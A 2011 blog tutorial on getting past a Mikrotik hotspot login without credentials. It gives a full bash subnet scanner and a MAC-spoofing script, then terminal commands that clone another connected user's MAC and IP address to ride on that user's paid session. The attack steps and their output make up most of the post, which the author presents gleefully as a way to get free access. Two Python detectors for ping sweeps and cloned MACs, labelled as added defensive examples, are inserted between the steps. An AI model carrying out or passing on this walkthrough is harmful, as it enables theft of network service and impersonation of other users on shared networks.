
19 April 2011

Bypass Mikrotik Hotspot Login Page on Linux

When we want to use the internet service on a campus, in a hotel, in a cafe or in some other public place, we are usually redirected first to a login page before we can connect to the internet. This process is called authentication: it verifies that you are someone entitled to the service that is offered.

So what about those who do not have their own credentials, such as a username and password? :p
Relax, here is how it works :D

First we join the local network: find an access point, set it up, then obtain an IP address (just use DHCP).

root@nyubicrew.us:~# ifconfig wlan0 up
root@nyubicrew.us:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"POWER RANGERS @SERVER 05"
                    ESSID:"802.11g-SSID"
root@nyubicrew.us:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@nyubicrew.us:~# dhclient wlan0
Internet Systems Consortium DHCP Client V3.1.1
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/

Listening on LPF/wlan0/00:a4:15:af:4a:f1 
Sending on   LPF/wlan0/00:a4:15:af:4a:f1
Sending on   Socket/fallback
DHCPNAK from 192.168.88.1
DHCPDISCOVER on wlan0 to 255.255.255.255 port 67 interval 6
DHCPOFFER of 192.168.88.135 from 192.168.88.1
DHCPREQUEST of 192.168.88.135 on wlan0 to 255.255.255.255 port 67
DHCPACK of 192.168.88.135 from 192.168.88.1
bound to 192.168.88.135 -- renewal in 20738 seconds.
OK, now we are connected to the network with IP address 192.168.88.135; first let's check connectivity to the router
root@nyubicrew.us:~# ping 192.168.88.1
PING 192.168.88.1 (192.168.88.1) 56(84) bytes of data.
64 bytes from 192.168.88.1: icmp_seq=1 ttl=64 time=2350 ms
64 bytes from 192.168.88.1: icmp_seq=2 ttl=64 time=1633 ms
OK, good.... now we look for the MAC address of the target that we are going to clone :)
I use a tool written by Agus Bimantoro a.k.a. abi71; here is the script :)

#!/bin/bash
#------------------------------------------------------------------------------------
#scan-ip.sh v.1.0
#written by aBi71 juli-2010
#l0g[dot]bima[at]gmail[dot]com
#http://abi71.wordpress.com, http://projects.gxrg.org
#credits: [G]gunadarma[X]xmalang[R]research[G]group 
#license: GPL (Gnu public license)
#scan-ip is a simple bash script for network scanner, only used for class C networks.
#with this script you can find a live host in the network.
#------------------------------------------------------------------------------------
#--------- set color ---------
white='\033[1;37m'
red='\033[0;31;1;31m'
yellow='\033[1;33m'
green='\033[0;32;1;32m'
blue='\033[1;34m'
default='\033[0m'
#--------- function help ---------
function display_help (){
echo -e "${white}Usage: $0  [ip_start] [ip_end] 
Options: 
   -h    Display usage information
   -m    Include MAC address

option -m (include MAC address), only used for super users (eg. root) !!!

Please visit 
Report bugs to ${default}"
exit 0
}
#---------- console usage  ----------
if [ $# -lt 1 ]; then
display_help
else
case $1 in
         -h)
            echo -e "${white}Example: $0 125.160.119.30 125.160.119.71 
         $0 -m 192.168.1.20 192.168.1.55 wlan0${default}"
            exit 0
            ;;
         -m)       
            include_mac=yes    
             case $2 in
                 *.*.*.*) 
                         ip_start=$2
                          case $3 in
                              *.*.*.*)
                                      ip_end=$3
                                          case $4 in
                                                 *)
                                                   iface=$4
                                                 ;;
                                          esac
                                      ;;
                                *.*.*)
                                      display_help 
                                      ;;
                                  *.*)
                                      display_help
                                    ;;
                                 *) 
                                      display_help
                                    ;;
                      esac
                         ;;
                   *.*.*)
                         display_help
                         ;;
                     *.*)
                         display_help
                         ;;
                       *) 
                         display_help
                         ;;         
            esac
            ;;
    *.*.*.*)
            ip_start=$1
             case $2 in
                 *.*.*.*)
                         ip_end=$2
                         ;;
                   *.*.*)
                         display_help
                         ;;
                     *.*)
                         display_help
                         ;;
                       *) 
                         display_help
                         ;;
             esac
               ;;
      *.*.*)
            display_help
            ;;
        *.*)
            display_help
            ;;
          *) 
            display_help
            ;;         
esac
fi
#---------- set variable ---------- 
who_use=`whoami`
ip_host1=$(echo $ip_start | sed 's/\./ /g' | awk '{print $4}')
ip_host2=$(echo $ip_end | sed 's/\./ /g' | awk '{print $4}')
ip_class_c1=$(echo $ip_start | sed 's/\./ /g' | awk '{print $1,$2,$3}')
ip_class_c2=$(echo $ip_end | sed 's/\./ /g' | awk '{print $1,$2,$3}')
scan_start=$(date +%H\:%M\:%S)
#---------- check ----------
if [ "$ip_class_c1" = "$ip_class_c2" ] && [ "$ip_host1" -le "$ip_host2" ]; then 
     ip_class_c=$(echo $ip_start | sed 's/\./ /g' | awk '{print $1,$2,$3}')
     gateway=$(netstat -nr | grep "$iface" | grep "UG" | awk '{print $2}' | sed 's/\./ /g' | awk '{print $1"."$2"."$3}')
     echo $gateway > /tmp/.our_ip
     touch /tmp/.ip_list.sh
     echo "#!/bin/bash" > /tmp/.ip_list.sh
else
     display_help
fi
#----------scan process ----------
echo -n -e "${blue}[+]${default} ${white}scanning${default}"
while [ "$ip_host1" -le "$ip_host2" ]; do
  echo -n -e "${white}.${default}"
  join_ip_class_host=$(echo $ip_class_c $ip_host1 | sed 's/\ /./g')
  if [ "$include_mac" != "yes" ]; then
     ip_ping=$(ping -q -w 1 $join_ip_class_host | grep "avg" | sed 's/\// /g' | sed 's/\./ /g'  | awk '{print $8}' &)
        if [ "$ip_ping" != "" ]; then              
           echo "echo -e '${white}$join_ip_class_host ${default} ${green}alive${default}'" >> /tmp/.ip_list.sh
    let count_iplive++ 
             else 
           echo "echo -e '${white}$join_ip_class_host${default} ${red} timeout${default}'" >> /tmp/.ip_list.sh
    let count_ipdead++
        fi
      else if [ "$who_use" = "root" ]; then
                 if [ "$iface" = "" ] || [ "$gateway" = "" ]; then
                    echo -e "\n${red}[!]${default} ${white}Inactive network cards, Please try again and make sure you have an interface with the correct insert.${default}\n"
                    $0 -h
                    exit 0
                 fi
             our_ip=$(ifconfig -a | grep -f /tmp/.our_ip | sed 's/\:/ /g' | awk '{print $3}')
             arp_ping=$(arping -f -c 1 -I $iface -s $our_ip $join_ip_class_host | grep "reply" | awk '{print $4" at "$5}' &)
                 if [ "$arp_ping" != "" ]; then              
                    echo "echo -e '${white}$arp_ping ${default}${green}alive${default}'" >> /tmp/.ip_list.sh
             let count_iplive++ 
                  else 
                    echo "echo -e '${white}$join_ip_class_host at [00:00:00:00:00:00]${default}${red} timeout${default}'" >> /tmp/.ip_list.sh
             let count_ipdead++
                 fi
      else
         echo -n -e "\n${red}[!]${default} ${white}Sorry you can't used this options, so running it may require superuser privileges (eg. root).${default}\n"
         exit 0
      fi 
  fi
  let process++
  let ip_host1++
done
#---------- scanned list ----------
scan_end=$(date +%H\:%M\:%S)
echo -e "\n${green}                              _       
    ___  ___ __ _ _ __       (_)_ __  
   / __|/ __/ _' | '_ \ _____| | '_ \ 
   \__ \ (_| (_| | | | |_____| | |_) |
   |___/\___\__,_|_| |_|     |_| .__/ 
    ${yellow}version 1.0${default}                ${green}|_|${default}    
${default}"
echo -e "${green}--${default} ${yellow}scan-ip.sh v.1.0${default} ${green}--------------------------${default}"
echo -e "${yellow}IP range:${default} ${white}$ip_start${default} ${yellow}to${default} ${white}$ip_end${default}"
echo -e "${yellow}Started:${default} ${white}$scan_start${default}"
echo -e "${yellow}Ended:${default} ${white}$scan_end${default}"
echo -e "${yellow}IP live:${default} ${white}$count_iplive${default}"
echo -e "${yellow}IP dead:${default} ${white}$count_ipdead${default}"
echo -e "${yellow}Total scan:${default} ${white}`expr $count_iplive + $count_ipdead`${default}"
echo -e "${yellow}Scanned on host:${default} 
`bash /tmp/.ip_list.sh`"
echo -e "${yellow}Speed scanned:${default} ${white}`echo $(echo $scan_end | sed 's/\:/ /g' | sed 's/ //g')-$(echo $scan_start | sed 's/\:/ /g' | sed 's/ //g') | bc` second${default}"
echo -e "${green}----------------------------------------------${default}"
echo -e "                          ${yellow}(c) July 2010 - GXRG ${default}"
#--------- clear created file ---------
rm /tmp/.ip_list.sh && rm /tmp/.our_ip
exit 0

Download the script file and don't forget to chmod +x scan-ip.sh so it can be executed easily on your *nix machine.

then scan the IP range with the command

./scan-ip.sh  [ip_start] [ip_end] 
After that a number of live IP addresses will show up; ping one of them. As an example I take IP address 192.168.88.201
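What the sweep above looks like from the other side of the wire, as an added example that is not part of the original post or of abi71's tools: a small Python detector that reads netfilter LOG lines (the lines below are constructed; that a `-j LOG` rule for ICMP echo requests exists on a sensor which sees the LAN's ICMP traffic is an assumption about the defender's setup) and raises an alert when one source address probes several distinct hosts within a short window. It only catches ICMP sweeps; the script's `-m` mode uses ARP, which netfilter's LOG target never sees, so that case needs an ARP monitor such as arpwatch.

```python
"""Ping-sweep detector over netfilter LOG lines (added example, not from the original post)."""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed, abridged sample of what a netfilter `-j LOG` rule for ICMP echo requests
# writes to syslog (the rule and the sensor that sees the LAN traffic are assumptions).
# 192.168.88.50 is an ordinary client pinging its gateway; 192.168.88.135 walks through
# consecutive hosts the way scan-ip.sh does.
SAMPLE_LOG = """\
Apr 19 10:01:01 gw kernel: IN=wlan0 OUT= SRC=192.168.88.50 DST=192.168.88.1 LEN=84 TTL=128 ID=1 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:02 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.200 LEN=84 TTL=64 ID=2 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:02 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.201 LEN=84 TTL=64 ID=3 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:03 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.202 LEN=84 TTL=64 ID=4 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:03 gw kernel: IN=wlan0 OUT= SRC=192.168.88.50 DST=192.168.88.1 LEN=84 TTL=128 ID=5 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:04 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.203 LEN=84 TTL=64 ID=6 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:05 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.204 LEN=84 TTL=64 ID=7 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:06 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.205 LEN=84 TTL=64 ID=8 PROTO=ICMP TYPE=8 CODE=0
Apr 19 10:01:07 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.1 LEN=60 TTL=64 ID=9 DF PROTO=TCP SPT=40000 DPT=80 SYN URGP=0
Apr 19 10:01:30 gw kernel: IN=wlan0 OUT= SRC=192.168.88.135 DST=192.168.88.210 LEN=84 TTL=64 ID=10 PROTO=ICMP TYPE=8 CODE=0
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?PROTO=(?P<proto>\S+)(?: TYPE=(?P<type>\d+))?"
)


def parse(line):
    """Return the fields we need from one LOG line, or None for lines of another shape."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # syslog timestamps carry no year; strptime defaults it, which is fine for ordering
    rec["ts"] = datetime.strptime(rec["ts"], "%b %d %H:%M:%S")
    return rec


def is_probe(rec):
    """ICMP echo request (type 8) is what `ping` sends; anything else is ignored here."""
    return rec["proto"] == "ICMP" and rec["type"] == "8"


def detect_sweeps(lines, window_s=10, min_targets=5):
    """Return (src, distinct_targets) alerts, one per source, the moment it crosses the threshold."""
    recent = defaultdict(deque)  # src -> deque of (timestamp, dst) inside the sliding window
    alerted = set()
    alerts = []
    for line in lines:
        rec = parse(line)
        if rec is None or not is_probe(rec):
            continue
        q = recent[rec["src"]]
        q.append((rec["ts"], rec["dst"]))
        # drop probes that fell out of the window
        while (rec["ts"] - q[0][0]).total_seconds() > window_s:
            q.popleft()
        targets = {dst for _, dst in q}
        if len(targets) >= min_targets and rec["src"] not in alerted:
            alerted.add(rec["src"])
            alerts.append((rec["src"], len(targets)))
    return alerts


def run_sample():
    """Run the detector over the constructed log; expected: [('192.168.88.135', 5)]."""
    return detect_sweeps(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for src, n in run_sample():
        print(f"[!] ping sweep from {src}: {n} distinct hosts probed within the window")
```

The threshold and window are deliberately loose; a client pinging its gateway twice never trips them, while a sequential walk through a /24 does within its first few hosts. On a live box, feed `journalctl -k -f` or the syslog file into `detect_sweeps` line by line.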

root@nyubicrew.us:~# ping 192.168.88.201
PING 192.168.88.201 (192.168.88.201) 56(84) bytes of data.
64 bytes from 192.168.88.201: icmp_seq=1 ttl=128 time=170 ms
64 bytes from 192.168.88.201: icmp_seq=2 ttl=128 time=26.8 ms
OK, now find out its MAC address by looking at the ARP table

root@nyubicrew.us:~# arp -a
? (192.168.88.201) at 00:21:5c:3a:de:f1 [ether] on wlan0
? (192.168.88.1) at aa:00:04:00:0a:04 [ether] on wlan0
Great!! we now have the MAC address 00:21:5c:3a:de:f1 of host 192.168.88.201
Next, bring the interface down and change our MAC address to the victim's MAC address using the
macfaked tool by Agus Bimantoro a.k.a. abi71 (sorry, I'm borrowing your tool again xixixixi :D)
here is the script

#!/bin/bash
#------------------------------------------------------------------------------------
#macfaked.sh v.0.1
#written by aBi71 Sept-2010
#l0g[dot]bima[at]gmail[dot]com
#http://abi71.wordpress.com, http://projects.gxrg.org
#credits: [G]gunadarma [X]xmalang [R]research [G]groups
#license: Licensed under the GNU General Public License
#------------------------------------------------------------------------------------
#Greatz to GXRG linux team.
#
#DESC: This tools is a simple bash script for changing mac address.
#

faked=True
whouse=`whoami`

function display_help (){
echo -e "macfaked 0.1 by aBi71 

Usage: $0  [interface]

Ex: ./macfaked.sh -r eth0
./macfaked.sh -m 00:11:22:33:44:55 wlan0

Options:
-r    random mac address
-m    mac address

Please visit "
exit 0
}

if [ "$whouse" == "root" ]; then
while [ "$faked" == "True" ]; do
#variable random
a=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
b=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
c=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
d=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
e=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
f=$(cat /dev/urandom | tr -cd '0-9a-f' | head -c2)
if [ $# -lt 1 ]; then
display_help
elif [ "$1" == "-r" ] && [ "$2" != "" ]; then
down_iface=$(ifconfig $2 down 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$down_iface" == "" ]; then
before=$(ifconfig $2 | grep HWaddr | awk '{print $5}')
mac_changer=$(ifconfig $2 hw ether $a:$b:$c:$d:$e:$f 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$mac_changer" == "" ]; then
echo "Changed: [$before]  ->  [$a:$b:$c:$d:$e:$f]"
faked=False
fi
else
echo "$2: No such device."
faked=False
fi
elif [ "$1" == "-m" ] && [ "$2" != "" ] && [ "$3" != "" ]; then
down_iface=$(ifconfig $3 down 2> /tmp/macfaked.log; cat /tmp/macfaked.log)
if [ "$down_iface" == "" ]; then
before=$(ifconfig $3 | grep HWaddr | awk '{print $5}')
macAddress=$(echo $2 > /tmp/macchange.log ;wc /tmp/macchange.log | awk '{print $3}')
if [ "$macAddress" == "18" ]; then
mac_changer=$(ifconfig $3 hw ether $2 2> /tmp/macchange.log; cat /tmp/macchange.log)
else
mac_changer=failed
fi

if [ "$mac_changer" == "" ] && [ "$macAddress" == "18" ] ; then
echo "Changed: [$before]  ->  [$2]"
faked=False
else
echo "[!] Cannot assign requested address, please try again."
faked=False
fi

else
echo "$3: No such device."
faked=False
fi
else
display_help
fi
done
rm /tmp/macfaked.log 2> /dev/null
rm /tmp/macchange.log 2> /dev/null
else
echo "[!] You must be root."
fi
Ok, let's try this c0de :D 
root@nyubicrew.us:~#./macfaked -m 00:21:5c:3a:de:f1 wlan0 
changed: [00:a4:15:af:4a:f1] -> [00:21:5c:3a:de:f1] 
root@nyubicrew.us:~# ifconfig wlan0
wlan0     Link encap:Ethernet  HWaddr 00:21:5c:3a:de:f1
          inet addr:192.168.88.201  Bcast:192.168.88.255  Mask:255.255.255.0
 
OK, it has changed, right :)
Now bring the interface up and connect again, then set the IP address to the victim's IP address.
root@nyubicrew.us:~# ifconfig wlan0 up
root@nyubicrew.us:~# iwlist wlan0 scan | grep ESSID
                    ESSID:"POWER RANGERS @SERVER 05"
                    ESSID:"802.11g-SSID"
root@nyubicrew.us:~# iwconfig wlan0 ESSID "802.11g-SSID"
root@nyubicrew.us:~# ifconfig wlan0 192.168.88.201/24
root@nyubicrew.us:~# route add default gw 192.168.88.1

Now let's try to ping www.google.co.id

root@nyubicre.us:~# ping google.co.id
PING google.co.id (72.14.254.104) 56(84) bytes of data.
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=1 ttl=55 time=695 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=2 ttl=55 time=76.8 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=3 ttl=55 time=38.6 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=4 ttl=55 time=25.1 ms
64 bytes from sin01s04-in-f104.1e100.net (72.14.254.104): icmp_seq=5 ttl=55 time=27.2 ms
Yes.... it works.... it works... it works... hooray :p #dora mode on hahaha :D
At this point we can use the internet connection by piggybacking on someone else's MAC address.
If the owner of that host goes offline, we go offline too; that's what piggybacking means, when the one
you're riding along with is done, so are you hehehe :)
Oh yes... to change the MAC address we can also use other tools such as macchanger and the like
that are compatible with unix machines :)
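What the successful clone looks like to a defender, as an added example that is not part of the original post or of abi71's tools. The page's own output already contains the tell: before the clone, 192.168.88.201 answers ping with ttl=128 (a Windows-class initial TTL), whereas a Linux host sends with an initial TTL of 64. A hotspot that binds a session to MAC and IP alone cannot tell the two apart, but a passive sensor can. This Python detector takes (time, ip, mac, ttl) observations (constructed here; that they come from a packet capture on the hotspot LAN is an assumption about the defender's setup) and alerts when the TTL class behind a MAC changes, and again when the MAC flips back and forth between classes, which means two live hosts are using it at the same time.

```python
"""MAC-identity drift detector (added example, not from the original post)."""
from collections import defaultdict

# Constructed observations: (seconds, ip, mac, ttl) as a passive sensor on the hotspot LAN
# would extract from any IP packet each station emits (the sensor itself is assumed).
# 00:21:5c:3a:de:f1 / 192.168.88.201 is the page's victim; the TTLs mirror the page's output:
# 128 from the original host, 64 from a Linux box.
OBSERVATIONS = [
    (0,   "192.168.88.201", "00:21:5c:3a:de:f1", 128),
    (30,  "192.168.88.201", "00:21:5c:3a:de:f1", 128),
    (60,  "192.168.88.135", "00:a4:15:af:4a:f1", 64),   # a second station, before the clone
    (120, "192.168.88.201", "00:21:5c:3a:de:f1", 64),   # same MAC and IP, Linux-class TTL
    (150, "192.168.88.201", "00:21:5c:3a:de:f1", 128),  # the original host is still sending
]


def ttl_class(ttl):
    """Map an observed TTL to its most likely initial value (64 Linux/BSD, 128 Windows, 255 network gear).

    On a single LAN hop the TTL is still the initial value; across the internet it is the
    initial value minus the hop count, so 55 (as in the page's google ping) maps to 64.
    """
    for initial in (64, 128, 255):
        if ttl <= initial:
            return initial
    return None


def detect_identity_drift(observations, flap_window=600):
    """Return alerts for MACs whose apparent host fingerprint changes.

    ttl_class_change: a MAC's traffic switches TTL class (e.g. 128 -> 64); a different
                      operating system is now sending with this address.
    mac_collision:    within flap_window seconds the MAC alternates between two classes,
                      so two live hosts share it (the clone and its victim).
    """
    last_class = {}               # mac -> TTL class of the most recent packet
    history = defaultdict(list)   # mac -> [(t, TTL class)] seen so far
    alerts = []
    for t, ip, mac, ttl in observations:
        cls = ttl_class(ttl)
        prev = last_class.get(mac)
        if prev is not None and prev != cls:
            alerts.append({"t": t, "mac": mac, "ip": ip, "kind": "ttl_class_change",
                           "detail": f"{prev} -> {cls}"})
            # If this class was already seen from the MAC recently, the address is alternating
            # between two fingerprints: two hosts are using it at the same time.
            if any(c == cls and t - t0 <= flap_window for t0, c in history[mac]):
                alerts.append({"t": t, "mac": mac, "ip": ip, "kind": "mac_collision",
                               "detail": f"alternating between {prev} and {cls}"})
        history[mac].append((t, cls))
        last_class[mac] = cls
    return alerts


def run_sample():
    """Run the detector over the constructed observations; expected kinds:
    ttl_class_change at t=120, then ttl_class_change and mac_collision at t=150."""
    return detect_identity_drift(OBSERVATIONS)


if __name__ == "__main__":
    for a in run_sample():
        print(f"[!] t={a['t']:>4} {a['mac']} ({a['ip']}): {a['kind']} ({a['detail']})")
```

The alert is a cue to kill the hotspot session and force re-authentication, not proof on its own: a user who reboots the same laptop into another OS also changes TTL class, though not within minutes while the other OS is still sending. The durable fix is to stop treating MAC and IP as the session identity; per-user credentials over 802.1X/WPA2-Enterprise tie access to a key exchange rather than to an address that any station can copy.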

References:
http://projects.gxrg.org/?p=170 
http://projects.gxrg.org/?p=261
 
Thanks to Agus Bimantoro a.k.a. abi71
for lending his tools :D
